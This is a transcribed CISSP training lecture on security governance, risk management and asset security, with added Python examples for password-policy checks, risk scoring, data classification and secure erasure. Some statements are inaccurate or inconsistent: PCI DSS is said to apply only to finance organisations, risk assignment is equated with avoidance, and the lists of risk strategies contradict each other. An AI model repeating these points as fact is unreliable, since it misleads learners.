Then comes risk management. While we are implementing these policies and procedures, and we have those standards in place, if we face any risk during that period, or if we face any threat, or a vulnerability is identified during this period (all these terms we are going to discuss in a little bit), so when we identify vulnerabilities or threats, that's where our risks come into the picture. The risk management comes in saying, okay, this is a risk that we have identified, and now how do we want to mitigate the risk? Then the security organization comes into the picture: the day-to-day activity of how security is to be implemented. And for all of these procedures, policies, baselines, standards to be implemented, to be ensured that they are working properly, we need to make our employees aware that these policies exist and this is something that they need to follow. Thus the awareness, or the security education, comes into the picture here. The security education is more focused on helping employees adhere to the company policies and standards rather than educating employees about security. We don't want to make everybody an ethical hacker; we just want to ensure, or we want to assure the organization, that everybody has been warned about policies, procedures, security requirements and that they are going to follow those requirements. For example, a password policy where you have to adhere to a specific password policy to ensure passwords are created; at the same time there is another password policy which says that you should not share passwords with your colleagues, no matter what. So for my employees to follow that, I need to make them aware that these policies exist and there are repercussions if they do not follow these particular policies.

So coming back to the governance part: what is governance, since we have been talking about it? Governance ensures that the security strategies are aligned with business objectives and consistent with regulations. So what does it guarantee? Appropriate information security activities are being performed based on

what? Based on the policies that we have created, based on the standards that we have and the baselines that we would have created. So security has to be comparable, right? So if I say I have secured against particular attacks, the attacks have to be identified, and then, compared to those particular attacks, I can say I have mitigated these activities by having specific security controls; thus I can say that I am secure. The governance aspect keeps a watch on all the security controls to see that those security activities are ensured, are being implemented and are performing to the best of their abilities. That's where your governance comes into the picture.

The risks being reduced: so the risk management also comes under the governance, where you are looking at newly identified risks and you're then implementing security controls that would mitigate these risks. Then we are looking at information security investments being appropriately directed. So when I say I want a security control, which would be a firewall, IDS, IPS, antiviruses, whatever is required, it needs to have a return on investment which is acceptable for the organization. You don't want to spend too much money on security, thus creating losses for the organization. When you say a business, a business objective is always to make money rather than lose money, so security should be a supporting feature to the business objectives, where the services are being provided by the business in a secure manner, in such a way that they can still have a positive return on investment on the services that are being provided. And the executive management can determine the program's effectiveness. This is the major part, because in any compliance audits or technical audits we have to prove that whatever we have implemented actually works, is effective, does mitigate the risk. If your security controls are not effective, then you have just wasted a bucketload of money and have not achieved any security measures in your exercise.

Moving on to security controls. Security controls are measures taken to safeguard an information system from an attack, basically for the CIA triad, the confidentiality, integrity and availability. So security controls could

be administrative controls, technical controls or physical security controls. What are administrative security controls? There would be policies and procedures that we have in place. So the password policy becomes an administrative control, where the management has made everybody aware that the password needs to meet a particular complexity, should not be shared, and thus it becomes an administrative security control. A technical security control would be where we are implementing this policy, and thus when I try to create a password there is software that maps the password to the complexity requirements, assures or ensures that the complexity requirements have been met, and allows the password to be accepted or rejects the password, as the case may be. That is a security control. A physical security control may be, let's say, a CCTV camera which you are going to use to monitor people and ensure that nothing untoward happens. It's not only against physical crime, but let's say access to a particular room where nobody's seen tailgating, or maybe monitoring a server room which is very well secured and ensuring that unauthorized people do not get access, or purposefully or intently do not access that area, at all times. So these are the three levels of security controls that can be implemented to enhance the security of an organization.

Then we come to security policies. A policy is an overall broad statement produced by senior management that dictates the role of security within the organization. For example, the password policy that we talked about: it just said that it needs to meet a certain complexity, which is a

broad statement that is being made by the management, saying we want to adhere to this policy to ensure that we do not get hacked by brute-force attacks or dictionary attacks or whatever it is. The broad statement is trying to prevent certain attacks from happening on the organization; how it is implemented, that's where the procedures and everything else come into the picture. It must integrate security into all business processes. So if I start creating a policy which says that the complexity should be so high that the password should be at least 20 characters strong, that would be detrimental to the organization's health, because people may not remember those passwords, or resetting those passwords, or having technical mechanisms, technical security controls, in place to implement that kind of stringent security may be too expensive to have. So whatever policies are created, they need to be in line with the business processes as well. The policy must be reviewed and modified periodically, or as the company changes. So as and when the company becomes more mature and can have more levels of security, they must look at their policies again and redefine them; or as a company grows, or changes market scenarios, or changes business processes, these policies may become redundant, so you want to look at those policies and implement newer policies or modify the existing policies to suit the business processes in a better manner. It must support the vision and mission of the organization. A business, once established, will always have a long-term vision. For example, the e-tailer example that we are talking about: for me to open an e-tailer, e-retailing website, I don't want it to be periodic, I don't want it to be for a month or something like that; I want to achieve success in that factor and I want to create a plan of where I want to reach, let's say, in the next five years. So how do I achieve that? That's something that I need to plan as a business plan. All my security mechanisms that are in place should be in alignment with the business plans, business visions, across the number of years that we have envisaged the business to perform. So that's where the policies come into the picture. Policies are always long-term, not short-term documents, but need to be periodically reviewed and modified as the business grows or the business changes its posture.

Then, looking at compliance:

compliance means conforming to a rule, such as a specification, policy, standard or law. So we have looked at compliance from a perspective where we talked about ISO 27001 or PCI DSS or those frameworks. Now these are not laws, but these are standards or frameworks that have been created over a period of time through experience, and these are targeted towards organizations, towards specific industries. For example, PCI DSS is only towards finance organizations where they have payment gateways in place. ISO 27001 is a more generic policy which can be implemented by various organizations. HIPAA, the Health Insurance Portability and Accountability Act, is an American act that talks about health-related data of its citizens. So these are compliances; these may not be laws, but you need to adhere to these to be effective and to be allowed to conduct business in that particular industry.

Then we have the code of ethics. The code of ethics states: the safety of the commonwealth, duty to our principals and to each other, requires that we adhere, and be seen to adhere, to the highest ethical standards of behavior; therefore strict adherence to this code is a condition of certification. What are the ethics? Protect society, the commonwealth and the infrastructure; act honorably, honestly, justly, responsibly and legally; provide diligent and competent service to principals; advance and protect the profession. Now the code of ethics are codes created by (ISC)² for the CISSP professional, and you need to adhere to these codes. If they identify a violation of these codes by any member, they would debar the member, strip them of the certification and even blacklist them, based on whatever ethics they have violated. So even before the exam you have to go through the code of ethics; you have to accept the code of ethics. In the exam you may get up to five to six questions just on the code of ethics.

Then comes the legal systems; that's where the law comes into the picture. Law could differ from country to country or from region to region, and thus, depending on which country you are in,

you may need to be aware of the laws of those countries. As far as CISSP is concerned, as far as (ISC)² is concerned, they are an American organization, so they would talk about mostly American laws and a few European laws or directives as well. So there are three different laws that we talk about: civil, common and religious laws; it depends on the country, the culture of that particular country. The information security professional should understand the different legal systems followed internationally. So you also may come across the classification as civil law, criminal law and the law of torts. Civil law is basically a law where, let's say, a contract has been breached and it's not criminal in nature; you just want to sue an organization for breach of contract. Criminal law is where something criminal has happened under the particular act of that particular country, like, let's say, a murder, or an attack that has happened, a physical attack, or something got stolen. And the third one was the law of torts, where it's more of a compensatory law, where you can file a case, a civil suit, and demand compensation in lieu of the wrongs that have happened to that particular organization or that individual.

Then comes personnel security. The people inside the organization need access to data to complete their assigned work and hence have the potential to misuse these privileges, and thus you should have personnel security as well. Now when we talk about hiring practices for people, most of the organizations perform background checks, and we get confused why these background checks are being done. The background checks are essential to the health of the organization, where you are ensuring that the person is not a malicious person, has the prerequisite certifications or qualifications, has never been debarred or has never been prosecuted, does not have a criminal background, thus preventing physical attacks on the organization. For example, a competitor may attempt to place in your organization a spy, to gather information on the secrets of that organization and report it back to the competitor. A background check may reveal that this person was previously

employed by a competitor, and thus you might want to verify how that employment got terminated, when did it get terminated, or is this person misusing anything or misrepresenting any aspect of his or their life. Then you also need to get confidentiality agreements signed with them, for example NDAs, non-disclosure agreements: the data that is being shared with them, the ownership of that particular data, and what are the repercussions if that confidentiality is breached by that particular person. Conflict of interest agreements for positions handling competitive information: as you go higher up in the organization, you might come across contracts where it prohibits a particular person from engaging in the same activity with a competitor for a particular period of time. So if there is a conflict of interest when you are hiring a person, where they have signed such an agreement with another competitor or another organization, you don't want to embroil yourself in a lawsuit where the other organization may sue you for hiring a person while they were still under that particular contract. So it's not only to look at the background of these people, but to safeguard the organization from any lawsuits or any violations of contract as well. Get the non-compete agreements for the positions in charge of unique corporate processes; that again goes on to say if you're going to leave the organization you cannot start up a competing business similar to the organization's business, and so on and so forth.

Now let's come back to the technical aspect and start

talking about vulnerabilities, threats and risk. Now, what is a vulnerability? It is nothing but a weakness in a system or a process; it implies the absence of a countermeasure. A vulnerability is internal and is more easily managed. So it's basically a flaw, a misconfiguration, a design flaw, or something like using default usernames, passwords or configurations, where if that particular flaw is misused it will lead to a security event on that particular device for that particular organization. When we say a security event, it has to be detrimental in nature. So if somebody is using a weak password that can easily be cracked, that is a vulnerability: you have identified a weak password, and you want to address that vulnerability by imposing a security control or a countermeasure. The security control here starts off with having a robust security policy, where a password policy comes in that describes the complexity required of a particular password, and then you have a technical countermeasure, where you have implemented an identity and access management plan which ensures that the person creating that password adheres to the complexity required by that policy.

Then a threat. The threat is the possibility that the vulnerability might be exploited, which will result in loss. So if somebody has created a weak password and it has been allowed, that's a vulnerability which can be exploited by brute force attacks or dictionary-based attacks to crack passwords. If the password is cracked, somebody unauthorized may get access to that data, thus resulting in a loss for that organization. So the threat is the possibility of that particular vulnerability being exploited. And then comes the risk. The risk is basically the likelihood of that attack happening. So I have a weak password; it can be exploited by a brute force or dictionary attack; the likelihood of that attack is what determines the risk level for me. Now, the likelihood will always be hypothetical, but we don't want to run helter-skelter and we do not want to take the possibility to an extreme. So that's where your business processes

come into the picture, and your security policies come into the picture based on the business processes. Based on the policies implemented, if I have a weak password, what would be the loss that I would face for that particular person? For example, a fresher coming into an organization with a weak password but having limited access to data would carry a lesser risk, because the loss would be lesser, than a CEO of an organization using a weak password and thus getting exploited, because the CEO will have access to more proprietary data which, if it gets into the competitor's hands, would lead to huge losses. Thus the same risk of having a password cracked means, for a fresher, a lesser loss and thus a lesser risk, compared to the same risk for a CEO, where the loss would be higher.

A threat could also come in multiple forms. Threats could be natural, that means fires, flooding, tornadoes, anything that is an act of god that can happen with minimal human interaction. The second type would be man-made, where humans are responsible for it, like theft, hacking, rioting, war, anything that is created by humans. Technical threats could be software bugs, where vulnerabilities are created, or server failures, where something technical has gone wrong and you need a technically skilled person to come in and repair that particular aspect. Then the fourth one would be a supply system failure or a supply chain failure, where you have dependencies. For example, any organization will have a dependency on an electricity service provider, who is providing electricity as a service which powers the IT infrastructure. If the service provider fails and there is a power cut, your systems are not going to work, thus you need a secondary mechanism to prevent that threat from being realized.

Once we have identified these threats, identified these vulnerabilities, and identified the likelihood and the probability of that attack, that's where we come across the risk management exercise. Now, what is risk management? Risk management is a hypothetical exercise where we have identified a vulnerability, looked at the threat it may pose and the likelihood of that threat being realized, and once we have identified the threat and the risk level, that's where risk management comes into the picture. Reading from the slides, it is a core component of an enterprise security program.

Why? Because we need a baseline, and we compare security to that baseline. For example, I've got a firewall that has been configured in a particular manner. Now when I do a vulnerability assessment on the firewall, the vulnerability assessment gives me a report that states that some of the rules may now be redundant, thus allowing access to unauthorized users. This becomes a risk, or this becomes a threat: if this is identified by unauthorized people, they would then try to attack this firewall to gain access to data which they are not authorized to access, thus leading to losses for the organization. What is the likelihood of this happening? Whether the likelihood is high or low is what the risk management program is all about, right? And based on this risk we implement security controls, we manage the security controls, and then we verify the security controls as future risks come into the picture.
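The vulnerability, threat and risk chain just described, worked as code. This is an added example, not code from the Simplilearn course: it checks a password against an assumed complexity policy (the technical countermeasure), then scores the risk of the same weak-password vulnerability for two constructed accounts, a fresher and a CEO, using the standard quantitative formulas (single loss expectancy, annual rate of occurrence, annualized loss expectancy) that the course does not spell out, and finally weighs a countermeasure by its return on investment. The policy thresholds, the likelihood scale and the asset values are assumptions chosen for illustration.

```python
"""
Added example (not from the course): the weak-password vulnerability, the
password-policy countermeasure and the resulting risk level, worked as code.
Policy thresholds, likelihood scale and asset values are assumed values.
"""
import re

# --- Technical countermeasure: enforce the complexity the password policy describes ---
MIN_LENGTH = 12                                                      # assumed policy minimum
COMMON_PASSWORDS = {"password", "welcome1", "qwerty123", "letmein"}  # tiny constructed denylist


def check_password_policy(password):
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if not re.search(r"[a-z]", password):
        problems.append("no lowercase letter")
    if not re.search(r"[A-Z]", password):
        problems.append("no uppercase letter")
    if not re.search(r"[0-9]", password):
        problems.append("no digit")
    if not re.search(r"[^A-Za-z0-9]", password):
        problems.append("no symbol")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears in a common-password list")
    return problems


def is_weak(password):
    """The vulnerability: a password that fails policy is the one a guessing attack can crack."""
    return bool(check_password_policy(password))


# --- Risk: likelihood of the threat being realized x the loss if it is ---
# Assumed annual rate of occurrence (ARO) of a successful guessing/dictionary attack:
# high when the password is weak, low once it meets policy.
ARO = {"high": 0.9, "low": 0.1}


def annual_loss_expectancy(asset_value, exposure_factor, likelihood):
    """Standard quantitative formula: ALE = SLE x ARO, with SLE = asset value x exposure factor."""
    single_loss_expectancy = asset_value * exposure_factor
    return single_loss_expectancy * ARO[likelihood]


def password_risk(password, asset_value, exposure_factor):
    """Risk for one account: the same vulnerability, but the loss depends on what the account reaches."""
    likelihood = "high" if is_weak(password) else "low"
    return likelihood, annual_loss_expectancy(asset_value, exposure_factor, likelihood)


def safeguard_value(ale_before, ale_after, annual_control_cost):
    """Return on investment of a countermeasure: ALE reduction minus the control's yearly cost."""
    return ale_before - ale_after - annual_control_cost


def treatment(ale_before, ale_after, annual_control_cost):
    """Reduce the risk when the control pays for itself; otherwise accept it (or find a cheaper control)."""
    return "reduce" if safeguard_value(ale_before, ale_after, annual_control_cost) > 0 else "accept"


if __name__ == "__main__":
    # Constructed accounts: a fresher with limited data access and a CEO holding proprietary data.
    for who, value in (("fresher", 20_000), ("ceo", 2_000_000)):
        likelihood, ale_weak = password_risk("welcome1", value, 0.5)
        _, ale_strong = password_risk("Tr0ub4dor&3-Horse!", value, 0.5)
        print(who, likelihood, ale_weak, ale_strong, treatment(ale_weak, ale_strong, 50_000))
```

With these assumed numbers the fresher and the CEO share the same high likelihood, but the CEO's loss is a hundred times larger, so only for the CEO does a 50,000-a-year control pay for itself; for the fresher the arithmetic says accept the risk or choose a cheaper control. That is the likelihood-times-loss reasoning the course describes, made explicit.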

Risk management must be defined, and it is always defined, as an ongoing project, because risks will always change based on the business and based on the security controls that you have. This gives an organization guidance on how security is being implemented, how it has been enhanced over a period of time, and how mature in security that organization has become because of the risk assessment program. It also helps you to satisfy two aspects: due diligence and due care. What is due diligence? Due diligence is basically the research that an organization does in identifying those risks and how to mitigate them. Due care is the actual part of mitigation, where you have implemented a security control to mitigate the risk that you have identified. So if a company is negligent, meaning it doesn't have a risk management program, it is not going to be that security oriented, or its security is not going to be that great, thus the company may not comply with laws, regulations and standards, thus causing penalties, lawsuits and reputational damage in the industry.

Based on whatever they are doing for risk management, we come to frameworks. Frameworks are used to categorize information systems so that we can identify threats or risks based on the classification. This classification helps us determine the criticality and the sensitivity of an information system, right? So what are sensitivity and criticality? They basically give us an understanding of the value of the asset that we have. If you go back to domain one, the asset value, asset identification and asset security, that's where this comes into the picture. Obviously a database server is going to be more secure than an end user laptop based on the data they hold, thus the criticality of the system for a database is much higher than that of the end user's laptop. Then we look at the security controls that can be implemented; this is where frameworks like ISO 27001 come into the picture. There is COBIT, there are a lot of frameworks out there, NIST 800-53. Then we talk about assessing the security controls: once we have placed those security controls, we need to verify that those controls are placed properly, that they actually mitigate the risk, and that they are appropriate to correctly mitigate the particular risk they address. Then authorizing information systems: granting information systems operation based on the risks determined. So you have identified risks, and you authorize some of the devices to function in a particular manner, based on which some of those risks would be mitigated or reduced to an acceptable level.

So in the CISSP we talk about a lot of risk assessment strategies. We look at how we can manage risks; the four different types of managing risks would be: one is to mitigate, another is to transfer, the third is to accept it, and the fourth one is to neglect the risk. So the CISSP talks in great detail about those risk assessment strategies. We are talking about the four types of risk mitigating strategies: they are avoiding the risk, accepting the risk, transferring the risk and limiting the risk. So in the course we basically talk about a lot of risk strategies, how to mitigate these risks, and how they can be implemented to bring the risk down to an acceptable level. So again, risk acceptance and the risk appetite of an organization come into the picture; these terms are then discussed in the training to understand how the policies would work around the risk management strategy. Moving on, then, to monitoring security controls: once we have security controls in place and we have assessed them, we also need to monitor them for their effectiveness, and for whether they are going to create any alerts, whether any risks are being realized, or whether any new risk may be created by the security control implementation. So in this risk assessment these are the frameworks, these are the steps that we want to follow to identify, mitigate and monitor these risks.

So the management begins with risk assessment. What do you mean by risk assessment? Identifying the impact that the risk would have on the organization. And there would be two

different ways to assess the risk: a quantitative assessment or a qualitative assessment. A quantitative assessment is more quantifiable, or numerical, in its process, where you're looking at assigning costs to particular assets and threats. So the losses that you figure out in a risk assessment strategy would be more numerical, in a currency format: let's say a risk, if realized, would lead to a loss of X amount of dollars. That's where quantitative analysis comes into the picture. Qualitative analysis would be about the quality of a service. So if a service is being affected because of a risk, what is the degradation of that service, to what extent is it getting degraded? For example the internet that we use: if there is an internet outage, or if there is a reduction in internet speed. So if I've got a 10 Mbps line and, because of some fault of the ISP, it gets reduced to 4 Mbps, I may not be able to conduct the business that I was doing on a 10 Mbps line. Thus the quality of that service has degraded, so it is a risk and it is causing me losses, right? So qualitative risk analysis would be more descriptive in nature rather than numerical. Most companies or organizations would follow a hybrid policy, because it is not possible to have a quantitative risk analysis in each and every scenario. A new organization which doesn't have much historical data on how threats have affected that particular organization may go in for a qualitative analysis, and as they mature over time in their security practices they may then turn to a quantitative risk analysis, or a hybrid risk analysis where they're using a combination of both quantitative and qualitative.

Thus the risk controls that we were talking about: risk acceptance, risk reduction and risk assignment, and there is risk avoidance as well, so there are four controls. Risk reduction is where you have implemented a security control based on which the risk has been reduced to a more acceptable level. Risk assignment, also known as risk avoidance, is where you're avoiding the risk by outsourcing it. So, talking about risk controls again, the four types being accept, avoid, transfer and reduce: risk acceptance is where the organization is willingly accepting the risk the way it is, because they don't want to deal with it right now, they might deal with it in the next iteration, or it is at an acceptable level and the company just wants to move on. Avoiding the risk is where you are going to try not to use the service where the risk exists; thus avoidance is where you have identified a particular service where the risk exists and now you're not using that service, to avoid the risk altogether. Risk limitation or risk reduction would be where you are implementing a security control to mitigate the risk. And then risk transference is where risk assignment comes into the picture: you are transferring it to a third party, like outsourcing it, or by using insurance to limit the risk. So for example the threat is a fire, the risk is high but you cannot do anything about it, so you purchase insurance, so that if the fire actually happens you would still be reimbursed for the losses that you have faced.

Coming back to countermeasures, we have discussed administrative countermeasures; these are policies, rules, regulations, laws and customs that a company

needs to adhere to based on the industry that they are in. Then there are technical controls, software controls, anything that is technical in nature: IDS, IPS, firewalls, encryption, anything that is going to help you implement the CIA triad. And then physical controls, where you would look at locks on doors, security guards at fences, where they're preventing access by unauthorized people.

Let's talk about the roles and responsibilities of management. Now, as far as management or the hierarchy is concerned, you can see on the screen there's senior management, the security professional, the data owner, the custodian and the user. Now these are from the exam perspective, from the certification perspective; obviously the hierarchy in an organization would be slightly different. But here senior management is the responsible party for the entire security mechanism, so they must drive the entire security program. So the CISSP talks about a top-down approach where senior management has realized the importance of security and is implementing it at all levels within the organization; thus they are a part of it and they are supporting the security program. They define the tolerance of risk, how much risk is going to be tolerated by an organization, from a monetary perspective or a qualitative perspective as well, depending on the laws, legislation, regulations, compliance requirements and the contracts the business has signed. They will rely on security professionals to manage the risk, but the exercise and the management process have to be defined by senior management. Once the security team comes up with countermeasures, senior management either approves or disapproves them based on the return on investment of that countermeasure.

The security professional assists with the development of policy documents and gives their inputs, because they are the people who deal with these in the day-to-day process; thus they can identify gaps and give good inputs to modify or create the policy in a more robust manner. Security professionals may be a part of the risk assessment and risk management team as well, especially for the technical aspects of security. They assist with the implementation and maintenance of countermeasures, so for the administrative, technical or physical measures that have been identified, you may be requested to implement them. For example, the locks that we have on the door, the swipe locks, are connected to a database where the access information is maintained. As a security professional you wouldn't be responsible for fitting those locks, but for creating, managing and maintaining the database where the information about who is authorized and authenticated is kept. You would be responsible for monitoring, auditing and security assessments as well.

The data owner, the owner of that particular data, would normally be the head of the department; for example, the sales data is normally owned by the director of sales of that department, so they would be ultimately responsible for identifying that data, classifying that data and accepting the security controls that are implemented. They may request additional security controls if they deem fit; the security professional implements the security controls. Then the custodian: a person who is responsible for implementing the approved security controls or managing the day-to-day activity of the security controls. For example, the security professional has identified an access control to be implemented on a data set that the data owner owns, the data owner has approved it, and it is the custodian who is going to implement that strategy, or implement the control on it. The user is basically the person who accesses the information and IT resources. Whatever access controls have been implemented would identify the user, authenticate and authorize them, and hold them accountable for whatever they are doing. If the user is unable to authenticate, access would be

denied.

We will now focus on the second domain of CISSP, which is asset security. So let's understand the need for asset security through a small scenario. Well, it was yet another regular day in Tim's organization. Everything was going on fine until the organization faced a cyber attack. The hacker hacked all the servers in Tim's organization. The organization had loads of data, and not all of the data had the same level of protection; the level of protection varied from one piece of information to another. In this scenario the hacker could hack into only that particular data which was less protected. However, this cyber attack had a huge impact on the organization. In addition to this, it was also discovered that there was some flaw in the information classification process that exposed even sensitive data to the cyber attack; in other words, even crucial data was left with very little protection. This gave rise to asset security.

Asset security is defined as the process of collecting and protecting assets such as data and devices. Asset security helps an organization understand and classify data with respect to its importance, which in turn makes sure that highly valuable data receives the most protection. Asset security achieves its goals through its domains. The domains are information classification, then we have data classification, data lifecycle, data remnants, and finally data loss prevention. Each of these domains has different goals; all of these domains together make up asset security. Now let's have a look at each of these domains individually.

First up we have information classification. As you saw from what happened in Tim's organization, it is understood that the importance of data varies largely. We have to classify data before we can move on to protecting it; we need to be able to identify which is the most crucial data with respect to the organization. Information classification is defined as a process of segregating data based on its importance, to provide an adequate level of protection to every piece of data. Information classification is different for each sector; based on their objectives the classification varies. In the general sector information classification is used to minimize risks to crucial information, whereas in the government or military sector it is used to prevent unauthorized access, and finally in the commercial sector it is used to keep sensitive information private; here it is seen to it that information is not disclosed to a company's competitors.

Let's now move on to our second domain, that is data classification. As the name suggests, here data is basically classified based on a set of considerations. Here we will look into factors like data retention requirements, then data security requirements, data disposal methods, data encryption requirements, and finally compliance requirements. So these are the factors which are taken into consideration while classifying data. This entire process of data classification is taken care of by the data owner. In addition to the classification, they also analyze the use and value of the available data to the company. Finally, the data owner also annually reviews the data classification.
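A worked example of the data classification step just described: an automated first pass that finds sensitive identifiers in a piece of data, assigns a classification level, and attaches the handling factors the course lists (encryption, retention, disposal) together with the data owner's annual review date. This is an added example, not code from the Simplilearn course; the identifier patterns, the four classification levels, the handling rules per level and the sample records are assumptions chosen for illustration.

```python
"""
Added example (not from the course): an automated first pass at data
classification, so the data owner's review starts from findings rather than
guesswork. Identifier patterns, levels and handling rules are assumed values.
"""
import re
from datetime import date, timedelta

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+")
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")       # candidate payment-card numbers
MEDICAL_WORDS = ("patient", "diagnosis", "prescription")


def luhn_valid(digits):
    """Luhn checksum: separates real card numbers from random digit runs (fewer false positives)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_identifiers(text):
    """Return the set of sensitive identifier types present in the text."""
    found = set()
    if EMAIL_RE.search(text):
        found.add("email")
    for match in CARD_RE.finditer(text):
        if luhn_valid(re.sub(r"[ -]", "", match.group())):
            found.add("card_number")
    if any(word in text.lower() for word in MEDICAL_WORDS):
        found.add("medical")
    return found


# Assumed tiers, each carrying the factors the course lists: encryption,
# retention and disposal requirements (in practice compliance sets the numbers).
HANDLING = {
    "restricted":   {"encrypt": True,  "retention_years": 7, "disposal": "purge"},
    "confidential": {"encrypt": True,  "retention_years": 3, "disposal": "overwrite"},
    "internal":     {"encrypt": False, "retention_years": 1, "disposal": "clear"},
    "public":       {"encrypt": False, "retention_years": 0, "disposal": "none"},
}


def classify(text, shared_externally=False):
    """Map the identifiers found to a classification level."""
    ids = find_identifiers(text)
    if "card_number" in ids or "medical" in ids:
        level = "restricted"
    elif ids:
        level = "confidential"
    elif shared_externally:
        level = "public"
    else:
        level = "internal"
    return level, sorted(ids)


def classification_record(text, owner, today_iso, shared_externally=False):
    """Build the record the data owner signs off on, with the annual review date set."""
    level, ids = classify(text, shared_externally)
    review_due = date.fromisoformat(today_iso) + timedelta(days=365)
    record = {"owner": owner, "level": level, "identifiers": ids,
              "review_due": review_due.isoformat()}
    record.update(HANDLING[level])
    return record


if __name__ == "__main__":
    # Constructed sample records.
    for sample in ("Quarterly newsletter draft",
                   "Invoice paid by card 4111 1111 1111 1111",
                   "Patient diagnosis notes"):
        print(classification_record(sample, "Head of Department", "2023-01-01"))
```

The Luhn check is what keeps a sixteen-digit order number from being flagged as a card; tuning such checks is most of the real work in automated classification, and the data owner still reviews the result, which is why the record carries the review date.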

Before classifying data, an important step is to understand the data lifecycle. All of us speak of data all the time; however, do we know the various steps a piece of data goes through? Well, for that let us have a look at the third domain, the data lifecycle. We will start off from the data creation step and understand what happens to the data after that. As you see on your screens, we have six steps in the data lifecycle: they are create, store, use, share, archive and destroy. Starting off with the create phase: this is the first step in the data lifecycle; here new data is generated or existing data is updated. After the data is created, we use data repositories to store the created data; without storing data we cannot derive any information from it, hence this step is very crucial. In the third phase, data is viewed or used in some application, or processed. In addition to data being viewed and processed, it is also shared between various users and customers. Our fifth phase is archive; here data which is not used frequently, that is inactive data, is identified and then moved into long-term storage systems. And finally we have the destroy phase; as the name suggests, data is simply destroyed here. Data can be destroyed either digitally or physically. Not to forget, you cannot simply destroy data; it should be done based on regulations.

But have you wondered what happens if data is not destroyed even after we try our best to erase it? Well, this gives rise to data remnants. In simple words, data remnants is a term used for the residue of digital data which remains even after attempting to erase that particular data. Data remnants should be avoided, as it is not good to have remains of a piece of data which was intended to be destroyed. Security professionals should be well versed with techniques to avoid data remnants. So how do we tackle data remnants? For this we have various methods: they are purging, clearing, overwriting, degaussing, storing and finally destruction. Let's have a look at each of these methods individually and understand how they help in tackling data remnants. First up we have purging; purging is done to minimize risks to crucial information. In clearing, data from storage devices is removed; however, it can be reconstructed using various software. Third we have overwriting; here we write over the original data several times so that the original data cannot be recovered. Degaussing is the method used to destroy data on magnetic storage tapes. Next up we have storing; before storing data on media, the data is encrypted for the purpose of safety.
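Two of the methods above, overwriting and encrypting before storing, as working code. This is an added example, not code from the Simplilearn course. The first function overwrites a file in place before deleting it; the second part shows why encrypting data before it reaches the media matters: once the key is destroyed (often called crypto-erase), every remnant of the ciphertext is unreadable at once, which is the practical answer on flash media where in-place overwriting is not guaranteed to reach the old blocks. The pass count, the in-memory stand-in for the storage medium, and the SHA-256 counter-mode keystream (used only because the Python standard library has no AES; a real system would use AES-GCM from a vetted library) are assumptions for illustration.

```python
"""
Added example (not from the course): overwriting a file before deletion, and
encrypt-before-store with key destruction (crypto-erase) against data remnants.
The keystream construction is illustrative only; use AES-GCM in practice.
"""
import hashlib
import os
import secrets
import tempfile


def overwrite_and_delete(path, passes=3):
    """Overwrite a file in place several times, then unlink it, so the blocks the
    filesystem releases no longer hold the original bytes. Returns bytes overwritten.
    Caveat: SSDs (wear levelling) and journaling or copy-on-write filesystems may keep
    the old blocks elsewhere; there, crypto-erase or physical destruction is needed."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for i in range(passes):
            f.seek(0)
            # random data on the early passes, zeros on the last so the remnant is uniform
            pattern = secrets.token_bytes(size) if i < passes - 1 else bytes(size)
            f.write(pattern)
            f.flush()
            os.fsync(f.fileno())          # push the overwrite to the device before unlinking
    os.remove(path)
    return size


def demo_overwrite(data):
    """Write constructed data to a temp file, sanitize it, return (bytes overwritten, still exists)."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    overwritten = overwrite_and_delete(path)
    return overwritten, os.path.exists(path)


def _keystream(key, length):
    """Illustrative keystream: SHA-256 over key||counter (stdlib only, no authentication)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def encrypt_for_storage(key, plaintext):
    """Encrypt before the data ever touches the media."""
    return bytes(a ^ b for a, b in zip(plaintext, _keystream(key, len(plaintext))))


decrypt_from_storage = encrypt_for_storage   # XOR with the same keystream reverses it


class EncryptedStore:
    """Everything written is ciphertext; destroying the key makes all remnants unreadable."""

    def __init__(self):
        self._key = secrets.token_bytes(32)
        self.media = {}                       # constructed stand-in for the storage medium

    def write(self, name, data):
        self.media[name] = encrypt_for_storage(self._key, data)

    def read(self, name):
        if self._key is None:                 # crypto-erased: ciphertext is now just noise
            return None
        return decrypt_from_storage(self._key, self.media[name])

    def crypto_erase(self):
        """Destroy the key; returns how many stored objects became unrecoverable."""
        self._key = None
        return len(self.media)
```

The contrast is the point: overwriting must reach every copy of the bytes to work, while crypto-erase only has to destroy one small key, which is why encrypting data before it is stored is listed among the remnant-avoidance methods.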

Finally, the sixth method is destruction; here the storage devices which hold the data are physically damaged. Incineration, crushing and shredding are a few of the methods used for destruction.

Now let's move on to our fifth domain, data loss prevention. In this domain, various security measures are adopted that help in making data available only to authorized users. Here we will look into four such measures. The first measure is data inventory; in this step data is identified and then classified. In the second step the data flow is plotted over the lifecycle. The third measure is the data protection strategy; here a number of risk assessments are performed. The fourth measure is implementation; in this step we take up cases which have had a history of data loss for testing purposes.

Those were the five domains under asset security. In addition to these, it is also required that we understand the term privacy with respect to asset security. Privacy is a very crucial aspect when it comes to asset security. Information privacy and data privacy are more or less the same; this term is used to differentiate one person from another, and it relates to the personal data stored on computers. So what kind of data falls under this category? Well, we have data such as medical records, office data, financial data, etc., which fall under this category. To uphold privacy we use technologies like pseudonymization, tokenization and anonymization. Pseudonymization refers to a data management process; anonymization refers to a process of either encrypting or removing personally identifiable data so that the people the data describes remain anonymous; and finally, in tokenization a sensitive piece of data is substituted with a non-sensitive equivalent.

CISSP stands for the Certified Information Security, or rather the Certified Information Systems Security Professional. It is considered the gold standard in the field of information security. It is

